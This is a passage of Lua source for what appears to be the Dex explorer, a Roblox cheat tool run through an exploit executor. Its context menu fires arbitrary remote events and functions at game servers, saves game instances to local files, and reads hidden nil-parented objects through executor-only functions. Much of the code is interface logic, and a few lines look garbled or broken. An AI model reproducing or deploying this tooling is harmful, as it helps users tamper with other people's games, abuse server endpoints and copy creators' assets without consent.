CurrentRemoteWindow:Destroy() CurrentRemoteWindow = nil end CurrentRemoteWindow = RemoteWindow:Clone() CurrentRemoteWindow.Parent = explorerPanel.Parent CurrentRemoteWindow.Visible = true local displayValues = false local ArgumentList = CurrentRemoteWindow.MainWindow.Arguments local ArgumentTemplate = CurrentRemoteWindow.MainWindow.ArgumentTemplate if inst:IsA("RemoteEvent") then CurrentRemoteWindow.Title.Text = "Fire Event" CurrentRemoteWindow.MainWindow.Ok.Text = "Fire" CurrentRemoteWindow.MainWindow.DisplayReturned.Visible = false CurrentRemoteWindow.MainWindow.Desc2.Visible = false end local newArgument = ArgumentTemplate:Clone() newArgument.Parent = ArgumentList newArgument.Visible = true newArgument.Type.MouseButton1Down:connect(function() createDDown(newArgument.Type,function(choice) newArgument.Type.Text = choice end,"Script","Number","String","Color3","Vector3","Vector2","UDim2","NumberRange") end) CurrentRemoteWindow.MainWindow.Ok.MouseButton1Up:connect(function() if CurrentRemoteWindow and inst.Parent ~= nil then local MyArguments = {} for i,v in pairs(ArgumentList:GetChildren()) do table.insert(MyArguments,ToValue(v.Value.Text,v.Type.Text)) end if inst:IsA("RemoteFunction") then if displayValues then spawn(function() local myResults = inst:InvokeServer(unpack(MyArguments)) if myResults then CreateTableCaution("Remote Caller",myResults) else CreateCaution("Remote Caller","This remote did not return anything.") end end) else spawn(function() inst:InvokeServer(unpack(MyArguments)) end) end else inst:FireServer(unpack(MyArguments)) end CurrentRemoteWindow:Destroy() CurrentRemoteWindow = nil end end) CurrentRemoteWindow.MainWindow.Add.MouseButton1Up:connect(function() if CurrentRemoteWindow then local newArgument = ArgumentTemplate:Clone() newArgument.Position = UDim2.new(0,0,0,#ArgumentList:GetChildren() * 20) newArgument.Parent = ArgumentList ArgumentList.CanvasSize = UDim2.new(0,0,0,#ArgumentList:GetChildren() * 20) newArgument.Visible = true newArgument.Type.MouseButton1Down:connect(function() createDDown(newArgument.Type,function(choice) newArgument.Type.Text = choice end,"Script","Number","String","Color3","Vector3","Vector2","UDim2","NumberRange") end) end end) CurrentRemoteWindow.MainWindow.Subtract.MouseButton1Up:connect(function() if CurrentRemoteWindow then if #ArgumentList:GetChildren() > 1 then ArgumentList:GetChildren()[#ArgumentList:GetChildren()]:Destroy() ArgumentList.CanvasSize = UDim2.new(0,0,0,#ArgumentList:GetChildren() * 20) end end end) CurrentRemoteWindow.MainWindow.Cancel.MouseButton1Up:connect(function() if CurrentRemoteWindow then CurrentRemoteWindow:Destroy() CurrentRemoteWindow = nil end end) CurrentRemoteWindow.MainWindow.DisplayReturned.MouseButton1Up:connect(function() if displayValues then displayValues = false CurrentRemoteWindow.MainWindow.DisplayReturned.enabled.Visible = false else displayValues = true CurrentRemoteWindow.MainWindow.DisplayReturned.enabled.Visible = true end end) end function PromptSaveInstance(inst) if not SaveInstance and not _G.SaveInstance then CreateCaution("SaveInstance Missing","You do not have the SaveInstance function installed. Please go to RaspberryPi's thread to retrieve it.") return end if CurrentSaveInstanceWindow then CurrentSaveInstanceWindow:Destroy() CurrentSaveInstanceWindow = nil if explorerPanel.Parent:FindFirstChild("SaveInstanceOverwriteCaution") then explorerPanel.Parent.SaveInstanceOverwriteCaution:Destroy() end end CurrentSaveInstanceWindow = SaveInstanceWindow:Clone() CurrentSaveInstanceWindow.Parent = explorerPanel.Parent CurrentSaveInstanceWindow.Visible = true local filename = CurrentSaveInstanceWindow.MainWindow.FileName local saveObjects = true local overwriteCaution = false CurrentSaveInstanceWindow.MainWindow.Save.MouseButton1Up:connect(function() if readfile and getelysianpath then if readfile(getelysianpath()..filename.Text..".rbxmx") then if not overwriteCaution then overwriteCaution = true local newCaution = ConfirmationWindow:Clone() newCaution.Name = "SaveInstanceOverwriteCaution" newCaution.MainWindow.Desc.Text = "The file, "..filename.Text..".rbxmx, already exists. Overwrite?" newCaution.Parent = explorerPanel.Parent newCaution.Visible = true newCaution.MainWindow.Yes.MouseButton1Up:connect(function() ypcall(function() SaveInstance(inst,filename.Text..".rbxmx",not saveObjects) end) overwriteCaution = false newCaution:Destroy() if CurrentSaveInstanceWindow then CurrentSaveInstanceWindow:Destroy() CurrentSaveInstanceWindow = nil end end) newCaution.MainWindow.No.MouseButton1Up:connect(function() overwriteCaution = false newCaution:Destroy() end) end else ypcall(function() SaveInstance(inst,filename.Text..".rbxmx",not saveObjects) end) if CurrentSaveInstanceWindow then CurrentSaveInstanceWindow:Destroy() CurrentSaveInstanceWindow = nil if explorerPanel.Parent:FindFirstChild("SaveInstanceOverwriteCaution") then explorerPanel.Parent.SaveInstanceOverwriteCaution:Destroy() end end end else ypcall(function() if SaveInstance then SaveInstance(inst,filename.Text..".rbxmx",not saveObjects) else _G.SaveInstance(inst,filename.Text,not saveObjects) end end) if CurrentSaveInstanceWindow then CurrentSaveInstanceWindow:Destroy() CurrentSaveInstanceWindow = nil if explorerPanel.Parent:FindFirstChild("SaveInstanceOverwriteCaution") then explorerPanel.Parent.SaveInstanceOverwriteCaution:Destroy() end end end end) CurrentSaveInstanceWindow.MainWindow.Cancel.MouseButton1Up:connect(function() if CurrentSaveInstanceWindow then CurrentSaveInstanceWindow:Destroy() CurrentSaveInstanceWindow = nil if explorerPanel.Parent:FindFirstChild("SaveInstanceOverwriteCaution") then explorerPanel.Parent.SaveInstanceOverwriteCaution:Destroy() end end end) CurrentSaveInstanceWindow.MainWindow.SaveObjects.MouseButton1Up:connect(function() if saveObjects then saveObjects = false CurrentSaveInstanceWindow.MainWindow.SaveObjects.enabled.Visible = false else saveObjects = true CurrentSaveInstanceWindow.MainWindow.SaveObjects.enabled.Visible = true end end) end function DestroyRightClick() if currentRightClickMenu then currentRightClickMenu:Destroy() currentRightClickMenu = nil end if CurrentInsertObjectWindow and CurrentInsertObjectWindow.Visible then CurrentInsertObjectWindow.Visible = false end end function rightClickMenu(sObj) local mouse = game:GetService("Players").LocalPlayer:GetMouse() currentRightClickMenu = CreateRightClickMenu( {"Cut","Copy","Paste Into","Duplicate","Delete","Group","Ungroup","Select Children","Teleport To","Insert Part","Insert Object","View Script","Save Instance","Call Function","Call Remote"}, "", false, function(option) if option == "Cut" then if not Option.Modifiable then return end clipboard = {} local list = Selection.List local cut = {} for i = 1,#list do local obj = list[i]:Clone() if obj then table.insert(clipboard,obj) table.insert(cut,list[i]) end end for i = 1,#cut do pcall(delete,cut[i]) end updateActions() elseif option == "Copy" then if not Option.Modifiable then return end clipboard = {} local list = Selection.List for i = 1,#list do table.insert(clipboard,list[i]:Clone()) end updateActions() elseif option == "Paste Into" then if not Option.Modifiable then return end local parent = Selection.List[1] or workspace for i = 1,#clipboard do clipboard[i]:Clone().Parent = parent end elseif option == "Duplicate" then if not Option.Modifiable then return end local list = Selection:Get() for i = 1,#list do list[i]:Clone().Parent = Selection.List[1].Parent or workspace end elseif option == "Delete" then if not Option.Modifiable then return end local list = Selection:Get() for i = 1,#list do pcall(delete,list[i]) end Selection:Set({}) elseif option == "Group" then if not Option.Modifiable then return end local newModel = Instance.new("Model") local list = Selection:Get() newModel.Parent = Selection.List[1].Parent or workspace for i = 1,#list do list[i].Parent = newModel end Selection:Set({}) elseif option == "Ungroup" then if not Option.Modifiable then return end local ungrouped = {} local list = Selection:Get() for i = 1,#list do if list[i]:IsA("Model") then for i2,v2 in pairs(list[i]:GetChildren()) do v2.Parent = list[i].Parent or workspace table.insert(ungrouped,v2) end pcall(delete,list[i]) end end Selection:Set({}) if SettingsRemote:Invoke("SelectUngrouped") then for i,v in pairs(ungrouped) do Selection:Add(v) end end elseif option == "Select Children" then if not Option.Modifiable then return end local list = Selection:Get() Selection:Set({}) Selection:StopUpdates() for i = 1,#list do for i2,v2 in pairs(list[i]:GetChildren()) do Selection:Add(v2) end end Selection:ResumeUpdates() elseif option == "Teleport To" then if not Option.Modifiable then return end local list = Selection:Get() for i = 1,#list do if list[i]:IsA("BasePart") then pcall(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = list[i].CFrame end) break end end elseif option == "Insert Part" then if not Option.Modifiable then return end local insertedParts = {} local list = Selection:Get() for i = 1,#list do pcall(function() local newPart = Instance.new("Part") newPart.Parent = list[i] newPart.CFrame = CFrame.new(game:GetService("Players").LocalPlayer.Character.Head.Position) + Vector3.new(0,3,0) table.insert(insertedParts,newPart) end) end elseif option == "Save Instance" then if not Option.Modifiable then return end local list = Selection:Get() if #list == 1 then list[1].Archivable = true ypcall(function()PromptSaveInstance(list[1]:Clone())end) elseif #list > 1 then local newModel = Instance.new("Model") newModel.Name = "SavedInstances" for i = 1,#list do ypcall(function() list[i].Archivable = true list[i]:Clone().Parent = newModel end) end PromptSaveInstance(newModel) end elseif option == "Call Remote" then if not Option.Modifiable then return end local list = Selection:Get() for i = 1,#list do if list[i]:IsA("RemoteFunction") or list[i]:IsA("RemoteEvent") then PromptRemoteCaller(list[i]) break end end elseif option == "View Script" then if not Option.Modifiable then return end local list = Selection:Get() for i = 1,#list do if list[i]:IsA("LocalScript") or list[i]:IsA("ModuleScript") then ScriptEditorEvent:Fire(list[i]) end end end end) currentRightClickMenu.Parent = explorerPanel.Parent currentRightClickMenu.Position = UDim2.new(0,mouse.X,0,mouse.Y) if currentRightClickMenu.AbsolutePosition.X + currentRightClickMenu.AbsoluteSize.X > explorerPanel.AbsolutePosition.X + explorerPanel.AbsoluteSize.X then currentRightClickMenu.Position = UDim2.new(0, explorerPanel.AbsolutePosition.X + explorerPanel.AbsoluteSize.X - currentRightClickMenu.AbsoluteSize.X, 0, mouse.Y) end end local function cancelReparentDrag()end local function cancelSelectDrag()end do local listEntries = {} local nameConnLookup = {} local mouseDrag = Create('ImageButton',{ Name = "MouseDrag"; Position = UDim2.new(-0.25,0,-0.25,0); Size = UDim2.new(1.5,0,1.5,0); Transparency = 1; AutoButtonColor = false; Active = true; ZIndex = 10; }) local function dragSelect(last,add,button) local connDrag local conUp conDrag = mouseDrag.MouseMoved:connect(function(x,y) local pos = Vector2.new(x,y) - listFrame.AbsolutePosition local size = listFrame.AbsoluteSize if pos.x < 0 or pos.x > size.x or pos.y < 0 or pos.y > size.y then return end local i = math.ceil(pos.y/ENTRY_BOUND) + scrollBar.ScrollIndex -- Mouse may have made a large step, so interpolate between the -- last index and the current. for n = ilast and i or last do local node = TreeList[n] if node then if add then Selection:Add(node.Object) else Selection:Remove(node.Object) end end end last = i end) function cancelSelectDrag() mouseDrag.Parent = nil conDrag:disconnect() conUp:disconnect() function cancelSelectDrag()end end conUp = mouseDrag[button]:connect(cancelSelectDrag) mouseDrag.Parent = GetScreen(listFrame) end local function dragReparent(object,dragGhost,clickPos,ghostOffset) local connDrag local conUp local conUp2 local parentIndex = nil local dragged = false local parentHighlight = Create('Frame',{ Transparency = 1; Visible = false; Create('Frame',{ BorderSizePixel = 0; BackgroundColor3 = Color3.new(0,0,0); BackgroundTransparency = 0.1; Position = UDim2.new(0,0,0,0); Size = UDim2.new(1,0,0,1); }); Create('Frame',{ BorderSizePixel = 0; BackgroundColor3 = Color3.new(0,0,0); BackgroundTransparency = 0.1; Position = UDim2.new(1,0,0,0); Size = UDim2.new(0,1,1,0); }); Create('Frame',{ BorderSizePixel = 0; BackgroundColor3 = Color3.new(0,0,0); BackgroundTransparency = 0.1; Position = UDim2.new(0,0,1,0); Size = UDim2.new(1,0,0,1); }); Create('Frame',{ BorderSizePixel = 0; BackgroundColor3 = Color3.new(0,0,0); BackgroundTransparency = 0.1; Position = UDim2.new(0,0,0,0); Size = UDim2.new(0,1,1,0); }); }) SetZIndex(parentHighlight,9) conDrag = mouseDrag.MouseMoved:connect(function(x,y) local dragPos = Vector2.new(x,y) if dragged then local pos = dragPos - listFrame.AbsolutePosition local size = listFrame.AbsoluteSize parentIndex = nil parentHighlight.Visible = false if pos.x >= 0 and pos.x <= size.x and pos.y >= 0 and pos.y <= size.y + ENTRY_SIZE*2 then local i = math.ceil(pos.y/ENTRY_BOUND-2) local node = TreeList[i + scrollBar.ScrollIndex] if node and node.Object ~= object and not object:IsAncestorOf(node.Object) then parentIndex = i local entry = listEntries[i] if entry then parentHighlight.Visible = true parentHighlight.Position = UDim2.new(0,1,0,entry.AbsolutePosition.y-listFrame.AbsolutePosition.y) parentHighlight.Size = UDim2.new(0,size.x-4,0,entry.AbsoluteSize.y) end end end dragGhost.Position = UDim2.new(0,dragPos.x+ghostOffset.x,0,dragPos.y+ghostOffset.y) elseif (clickPos-dragPos).magnitude > 8 then dragged = true SetZIndex(dragGhost,9) dragGhost.IndentFrame.Transparency = 0.25 dragGhost.IndentFrame.EntryText.TextColor3 = GuiColor.TextSelected dragGhost.Position = UDim2.new(0,dragPos.x+ghostOffset.x,0,dragPos.y+ghostOffset.y) dragGhost.Parent = GetScreen(listFrame) parentHighlight.Parent = listFrame end end) function cancelReparentDrag() mouseDrag.Parent = nil conDrag:disconnect() conUp:disconnect() conUp2:disconnect() dragGhost:Destroy() parentHighlight:Destroy() function cancelReparentDrag()end end local wasSelected = Selection.Selected[object] if not wasSelected and Option.Selectable then Selection:Set({object}) end conUp = mouseDrag.MouseButton1Up:connect(function() cancelReparentDrag() if dragged then if parentIndex then local parentNode = TreeList[parentIndex + scrollBar.ScrollIndex] if parentNode then parentNode.Expanded = true local parentObj = parentNode.Object local function parent(a,b) a.Parent = b end if Option.Selectable then local list = Selection.List for i = 1,#list do pcall(parent,list[i],parentObj) end else pcall(parent,object,parentObj) end end end else -- do selection click if wasSelected and Option.Selectable then Selection:Set({}) end end end) conUp2 = mouseDrag.MouseButton2Down:connect(function() cancelReparentDrag() end) mouseDrag.Parent = GetScreen(listFrame) end local entryTemplate = Create('ImageButton',{ Name = "Entry"; Transparency = 1; AutoButtonColor = false; Position = UDim2.new(0,0,0,0); Size = UDim2.new(1,0,0,ENTRY_SIZE); Create('Frame',{ Name = "IndentFrame"; BackgroundTransparency = 1; BackgroundColor3 = GuiColor.Selected; BorderColor3 = GuiColor.BorderSelected; Position = UDim2.new(0,0,0,0); Size = UDim2.new(1,0,1,0); Create(Icon('ImageButton',0),{ Name = "Expand"; AutoButtonColor = false; Position = UDim2.new(0,-GUI_SIZE,0.5,-GUI_SIZE/2); Size = UDim2.new(0,GUI_SIZE,0,GUI_SIZE); }); Create(Icon(nil,0),{ Name = "ExplorerIcon"; Position = UDim2.new(0,2+ENTRY_PADDING,0.5,-GUI_SIZE/2); Size = UDim2.new(0,GUI_SIZE,0,GUI_SIZE); }); Create('TextLabel',{ Name = "EntryText"; BackgroundTransparency = 1; TextColor3 = GuiColor.Text; TextXAlignment = 'Left'; TextYAlignment = 'Center'; Font = FONT; FontSize = FONT_SIZE; Text = ""; Position = UDim2.new(0,2+ENTRY_SIZE+4,0,0); Size = UDim2.new(1,-2,1,0); }); }); }) function scrollBar.UpdateCallback(self) for i = 1,self.VisibleSpace do local node = TreeList[i + self.ScrollIndex] if node then local entry = listEntries[i] if not entry then entry = Create(entryTemplate:Clone(),{ Position = UDim2.new(0,2,0,ENTRY_BOUND*(i-1)+2); Size = UDim2.new(0,nodeWidth,0,ENTRY_SIZE); ZIndex = listFrame.ZIndex; }) listEntries[i] = entry local expand = entry.IndentFrame.Expand expand.MouseEnter:connect(function() local node = TreeList[i + self.ScrollIndex] if #node > 0 then if node.Expanded then Icon(expand,NODE_EXPANDED_OVER) else Icon(expand,NODE_COLLAPSED_OVER) end end end) expand.MouseLeave:connect(function() local node = TreeList[i + self.ScrollIndex] if #node > 0 then if node.Expanded then Icon(expand,NODE_EXPANDED) else Icon(expand,NODE_COLLAPSED) end end end) expand.MouseButton1Down:connect(function() local node = TreeList[i + self.ScrollIndex] if #node > 0 then node.Expanded = not node.Expanded if node.Object == explorerPanel.Parent and node.Expanded then CreateCaution("Warning","Please be careful when editing instances inside here, this is like the System32 of Dex and modifying objects here can break Dex.") end -- use raw update so the list updates instantly rawUpdateList() end end) entry.MouseButton1Down:connect(function(x,y) local node = TreeList[i + self.ScrollIndex] DestroyRightClick() if GetAwaitRemote:Invoke() then bindSetAwaiting:Fire(node.Object) return end if not HoldingShift then lastSelectedNode = i + self.ScrollIndex end if HoldingShift and not filteringWorkspace() then if lastSelectedNode then if i + self.ScrollIndex - lastSelectedNode > 0 then Selection:StopUpdates() for i2 = 1, i + self.ScrollIndex - lastSelectedNode do local newNode = TreeList[lastSelectedNode + i2] if newNode then Selection:Add(newNode.Object) end end Selection:ResumeUpdates() else Selection:StopUpdates() for i2 = i + self.ScrollIndex - lastSelectedNode, 1 do local newNode = TreeList[lastSelectedNode + i2] if newNode then Selection:Add(newNode.Object) end end Selection:ResumeUpdates() end end return end if HoldingCtrl then if Selection.Selected[node.Object] then Selection:Remove(node.Object) else Selection:Add(node.Object) end return end if Option.Modifiable then local pos = Vector2.new(x,y) dragReparent(node.Object,entry:Clone(),pos,entry.AbsolutePosition-pos) elseif Option.Selectable then if Selection.Selected[node.Object] then Selection:Set({}) else Selection:Set({node.Object}) end dragSelect(i+self.ScrollIndex,true,'MouseButton1Up') end end) entry.MouseButton2Down:connect(function() if not Option.Selectable then return end DestroyRightClick() curSelect = entry local node = TreeList[i + self.ScrollIndex] if GetAwaitRemote:Invoke() then bindSetAwaiting:Fire(node.Object) return end if not Selection.Selected[node.Object] then Selection:Set({node.Object}) end end) entry.MouseButton2Up:connect(function() if not Option.Selectable then return end local node = TreeList[i + self.ScrollIndex] if checkMouseInGui(curSelect) then rightClickMenu(node.Object) end end) entry.Parent = listFrame end entry.Visible = true local object = node.Object -- update expand icon if #node == 0 then entry.IndentFrame.Expand.Visible = false elseif node.Expanded then Icon(entry.IndentFrame.Expand,NODE_EXPANDED) entry.IndentFrame.Expand.Visible = true else Icon(entry.IndentFrame.Expand,NODE_COLLAPSED) entry.IndentFrame.Expand.Visible = true end -- update explorer icon Icon(entry.IndentFrame.ExplorerIcon,ExplorerIndex[object.ClassName] or 0) -- update indentation local w = (node.Depth)*(2+ENTRY_PADDING+GUI_SIZE) entry.IndentFrame.Position = UDim2.new(0,w,0,0) entry.IndentFrame.Size = UDim2.new(1,-w,1,0) -- update name change detection if nameConnLookup[entry] then nameConnLookup[entry]:disconnect() end local text = entry.IndentFrame.EntryText text.Text = object.Name nameConnLookup[entry] = node.Object.Changed:connect(function(p) if p == 'Name' then text.Text = object.Name end end) -- update selection entry.IndentFrame.Transparency = node.Selected and 0 or 1 text.TextColor3 = GuiColor[node.Selected and 'TextSelected' or 'Text'] entry.Size = UDim2.new(0,nodeWidth,0,ENTRY_SIZE) elseif listEntries[i] then listEntries[i].Visible = false end end for i = self.VisibleSpace+1,self.TotalSpace do local entry = listEntries[i] if entry then listEntries[i] = nil entry:Destroy() end end end function scrollBarH.UpdateCallback(self) for i = 1,scrollBar.VisibleSpace do local node = TreeList[i + scrollBar.ScrollIndex] if node then local entry = listEntries[i] if entry then entry.Position = UDim2.new(0,2 - scrollBarH.ScrollIndex,0,ENTRY_BOUND*(i-1)+2) end end end end Connect(listFrame.Changed,function(p) if p == 'AbsoluteSize' then rawUpdateSize() end end) local wheelAmount = 6 explorerPanel.MouseWheelForward:connect(function() if scrollBar.VisibleSpace - 1 > wheelAmount then scrollBar:ScrollTo(scrollBar.ScrollIndex - wheelAmount) else scrollBar:ScrollTo(scrollBar.ScrollIndex - scrollBar.VisibleSpace) end end) explorerPanel.MouseWheelBackward:connect(function() if scrollBar.VisibleSpace - 1 > wheelAmount then scrollBar:ScrollTo(scrollBar.ScrollIndex + wheelAmount) else scrollBar:ScrollTo(scrollBar.ScrollIndex + scrollBar.VisibleSpace) end end) end ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---- Object detection -- Inserts `v` into `t` at `i`. Also sets `Index` field in `v`. local function insert(t,i,v) for n = #t,i,-1 do local v = t[n] v.Index = n+1 t[n+1] = v end v.Index = i t[i] = v end -- Removes `i` from `t`. Also sets `Index` field in removed value. local function remove(t,i) local v = t[i] for n = i+1,#t do local v = t[n] v.Index = n-1 t[n-1] = v end t[#t] = nil v.Index = 0 return v end -- Returns how deep `o` is in the tree. local function depth(o) local d = -1 while o do o = o.Parent d = d + 1 end return d end local connLookup = {} -- Returns whether a node would be present in the tree list local function nodeIsVisible(node) local visible = true node = node.Parent while node and visible do visible = visible and node.Expanded node = node.Parent end return visible end -- Removes an object's tree node. Called when the object stops existing in the -- game tree. local function removeObject(object) local objectNode = NodeLookup[object] if not objectNode then return end local visible = nodeIsVisible(objectNode) Selection:Remove(object,true) local parent = objectNode.Parent remove(parent,objectNode.Index) NodeLookup[object] = nil connLookup[object]:disconnect() connLookup[object] = nil if visible then updateList() elseif nodeIsVisible(parent) then updateScroll() end end -- Moves a tree node to a new parent. Called when an existing object's parent -- changes. local function moveObject(object,parent) local objectNode = NodeLookup[object] if not objectNode then return end local parentNode = NodeLookup[parent] if not parentNode then return end local visible = nodeIsVisible(objectNode) remove(objectNode.Parent,objectNode.Index) objectNode.Parent = parentNode objectNode.Depth = depth(object) local function r(node,d) for i = 1,#node do node[i].Depth = d r(node[i],d+1) end end r(objectNode,objectNode.Depth+1) insert(parentNode,#parentNode+1,objectNode) if visible or nodeIsVisible(objectNode) then updateList() elseif nodeIsVisible(objectNode.Parent) then updateScroll() end end -- ScriptContext['/Libraries/LibraryRegistration/LibraryRegistration'] -- This RobloxLocked object lets me index its properties for some reason local function check(object) return object.AncestryChanged end -- Creates a new tree node from an object. Called when an object starts -- existing in the game tree. local function addObject(object,noupdate) if script then -- protect against naughty RobloxLocked objects local s = pcall(check,object) if not s then return end end local parentNode = NodeLookup[object.Parent] if not parentNode then return end local objectNode = { Object = object; Parent = parentNode; Index = 0; Expanded = false; Selected = false; Depth = depth(object); } connLookup[object] = Connect(object.AncestryChanged,function(c,p) if c == object then if p == nil then removeObject(c) else moveObject(c,p) end end end) NodeLookup[object] = objectNode insert(parentNode,#parentNode+1,objectNode) if not noupdate then if nodeIsVisible(objectNode) then updateList() elseif nodeIsVisible(objectNode.Parent) then updateScroll() end end end local function makeObject(obj,par) local newObject = Instance.new(obj.ClassName) for i,v in pairs(obj.Properties) do ypcall(function() local newProp newProp = ToPropValue(v.Value,v.Type) newObject[v.Name] = newProp end) end newObject.Parent = par end local function writeObject(obj) local newObject = {ClassName = obj.ClassName, Properties = {}} for i,v in pairs(RbxApi.GetProperties(obj.className)) do if v["Name"] ~= "Parent" then print("thispassed") table.insert(newObject.Properties,{Name = v["Name"], Type = v["ValueType"], Value = tostring(obj[v["Name"]])}) end end return newObject end local function buildDexStorage() local localDexStorage local success,err = ypcall(function() localDexStorage = game:GetObjects("rbxasset://DexStorage.rbxm")[1] end) if success and localDexStorage then for i,v in pairs(localDexStorage:GetChildren()) do ypcall(function() v.Parent = DexStorageMain end) end end updateDexStorageListeners() --[[ local localDexStorage = readfile(getelysianpath().."DexStorage.txt")--game:GetService("CookiesService"):GetCookieValue("DexStorage") --local success,err = pcall(function() if localDexStorage then local objTable = game:GetService("HttpService"):JSONDecode(localDexStorage) for i,v in pairs(objTable) do makeObject(v,DexStorageMain) end end --end) --]] end local dexStorageDebounce = false local dexStorageListeners = {} local function updateDexStorage() if dexStorageDebounce then return end dexStorageDebounce = true wait() pcall(function() saveinstance("content//DexStorage.rbxm",DexStorageMain) end) updateDexStorageListeners() dexStorageDebounce = false --[[ local success,err = ypcall(function() local objs = {} for i,v in pairs(DexStorageMain:GetChildren()) do table.insert(objs,writeObject(v)) end writefile(getelysianpath().."DexStorage.txt",game:GetService("HttpService"):JSONEncode(objs)) --game:GetService("CookiesService"):SetCookieValue("DexStorage",game:GetService("HttpService"):JSONEncode(objs)) end) if err then CreateCaution("DexStorage Save Fail!","DexStorage broke! If you see this message, report to Raspberry Pi!") end print("hi") --]] end function updateDexStorageListeners() for i,v in pairs(dexStorageListeners) do v:Disconnect() end dexStorageListeners = {} for i,v in pairs(DexStorageMain:GetChildren()) do pcall(function() local ev = v.Changed:connect(updateDexStorage) table.insert(dexStorageListeners,ev) end) end end do NodeLookup[game:GetService("Workspace").Parent] = { Object = game:GetService("Workspace").Parent; Parent = nil; Index = 0; Expanded = true; } if DexStorageEnabled then NodeLookup[DexStorage] = { Object = DexStorage; Parent = nil; Index = 0; Expanded = true; } end if NilStorageEnabled then NodeLookup[NilStorage] = { Object = NilStorage; Parent = nil; Index = 0; Expanded = true; } end Connect(game.DescendantAdded,addObject) Connect(game.DescendantRemoving,removeObject) if DexStorageEnabled then --[[ if readfile(getelysianpath().."DexStorage.txt") == nil then writefile(getelysianpath().."DexStorage.txt","") end --]] buildDexStorage() Connect(DexStorage.DescendantAdded,addObject) Connect(DexStorage.DescendantRemoving,removeObject) Connect(DexStorage.DescendantAdded,updateDexStorage) Connect(DexStorage.DescendantRemoving,updateDexStorage) end if NilStorageEnabled then Connect(NilStorage.DescendantAdded,addObject) Connect(NilStorage.DescendantRemoving,removeObject) local currentTable = get_nil_instances() spawn(function() while wait() do if #currentTable ~= #get_nil_instances() then currentTable = get_nil_instances() --NilStorageMain:ClearAllChildren() for i,v in pairs(get_nil_instances()) do if v ~= NilStorage and v ~= DexStorage then pcall(function() v.Parent = NilStorageMain end) --[[ local newNil = v newNil.Archivable = true newNil:Clone().Parent = NilStorageMain --]] end end end end end) end local function get(o) return o:GetChildren() end local function r(o) local s,children = pcall(get,o) if s then for i = 1,#children do addObject(children[i],true) r(children[i]) end end end r(game:GetService("Workspace").Parent) if DexStorageEnabled then r(DexStorage) end if NilStorageEnabled then r(NilStorage) end scrollBar.VisibleSpace = math.ceil(listFrame.AbsoluteSize.y/ENTRY_BOUND) updateList() end ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---- Actions local actionButtons do actionButtons = {} local totalActions = 1 local currentActions = totalActions local function makeButton(icon,over,name,vis,cond) local buttonEnabled = false local button = Create(Icon('ImageButton',icon),{ Name = name .. "Button"; Visible = Option.Modifiable and Option.Selectable; Position = UDim2.new(1,-(GUI_SIZE+2)*currentActions+2,0.25,-GUI_SIZE/2); Size = UDim2.new(0,GUI_SIZE,0,GUI_SIZE); Parent = headerFrame; }) local tipText = Create('TextLabel',{ Name = name .. "Text"; Text = name; Visible = false; BackgroundTransparency = 1; TextXAlignment = 'Right'; Font = FONT; FontSize = FONT_SIZE; Position = UDim2.new(0,0,0,0); Size = UDim2.new(1,-(GUI_SIZE+2)*totalActions,1,0); Parent = headerFrame; }) button.MouseEnter:connect(function() if buttonEnabled then button.BackgroundTransparency = 0.9 end --Icon(button,over) --tipText.Visible = true end) button.MouseLeave:connect(function() button.BackgroundTransparency = 1 --Icon(button,icon) --tipText.Visible = false end) currentActions = currentActions + 1 actionButtons[#actionButtons+1] = {Obj = button,Cond = cond} QuickButtons[#actionButtons+1] = {Obj = button,Cond = cond, Toggle = function(on) if on then buttonEnabled = true Icon(button,over) else buttonEnabled = false Icon(button,icon) end end} return button end --local clipboard = {} local function delete(o) Destroy(o) end makeButton(ACTION_EDITQUICKACCESS,ACTION_EDITQUICKACCESS,"Options",true,function()return true end).MouseButton1Click:connect(function() end) -- DELETE makeButton(ACTION_DELETE,ACTION_DELETE_OVER,"Delete",true,function() return #Selection:Get() > 0 end).MouseButton1Click:connect(function() if not Option.Modifiable then return end local list = Selection:Get() for i = 1,#list do pcall(delete,list[i]) end Selection:Set({}) end) -- PASTE makeButton(ACTION_PASTE,ACTION_PASTE_OVER,"Paste",true,function() return #Selection:Get() > 0 and #clipboard > 0 end).MouseButton1Click:connect(function() if not Option.Modifiable then return end local parent = Selection.List[1] or workspace for i = 1,#clipboard do clipboard[i]:Clone().Parent = parent end end) -- COPY makeButton(ACTION_COPY,ACTION_COPY_OVER,"Copy",true,function() return #Selection:Get() > 0 end).MouseButton1Click:connect(function() if not Option.Modifiable then return end clipboard = {} local list = Selection.List for i = 1,#list do table.insert(clipboard,list[i]:Clone()) end updateActions() end) -- CUT makeButton(ACTION_CUT,ACTION_CUT_OVER,"Cut",true,function() return #Selection:Get() > 0 end).MouseButton1Click:connect(function() if not Option.Modifiable then return end clipboard = {} local list = Selection.List local cut = {} for i = 1,#list do local obj = list[i]:Clone() if obj then table.insert(clipboard,obj) table.insert(cut,list[i]) end end for i = 1,#cut do pcall(delete,cut[i]) end updateActions() end) -- FREEZE makeButton(ACTION_FREEZE,ACTION_FREEZE,"Freeze",true,function() return true end) -- ADD/REMOVE STARRED makeButton(ACTION_ADDSTAR,ACTION_ADDSTAR_OVER,"Star",true,function() return #Selection:Get() > 0 end) -- STARRED makeButton(ACTION_STARRED,ACTION_STARRED,"Starred",true,function() return true end) -- SORT -- local actionSort = makeButton(ACTION_SORT,ACTION_SORT_OVER,"Sort") end ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---- Option Bindables do local optionCallback = { Modifiable = function(value) for i = 1,#actionButtons do actionButtons[i].Obj.Visible = value and Option.Selectable end cancelReparentDrag() end; Selectable = function(value) for i = 1,#actionButtons do actionButtons[i].Obj.Visible = value and Option.Modifiable end cancelSelectDrag() Selection:Set({}) end; } local bindSetOption = explorerPanel:FindFirstChild("SetOption") if not bindSetOption then bindSetOption = Create('BindableFunction',{Name = "SetOption"}) bindSetOption.Parent = explorerPanel end bindSetOption.OnInvoke = function(optionName,value) if optionCallback[optionName] then Option[optionName] = value optionCallback[optionName](value) end end local bindGetOption = explorerPanel:FindFirstChild("GetOption") if not bindGetOption then bindGetOption = Create('BindableFunction',{Name = "GetOption"}) bindGetOption.Parent = explorerPanel end bindGetOption.OnInvoke = function(optionName) if optionName then return Option[optionName] else local options = {} for k,v in pairs(Option) do options[k] = v end return options end end end function SelectionVar() return Selection end Input.InputBegan:connect(function(key) if key.KeyCode == Enum.KeyCode.LeftControl then 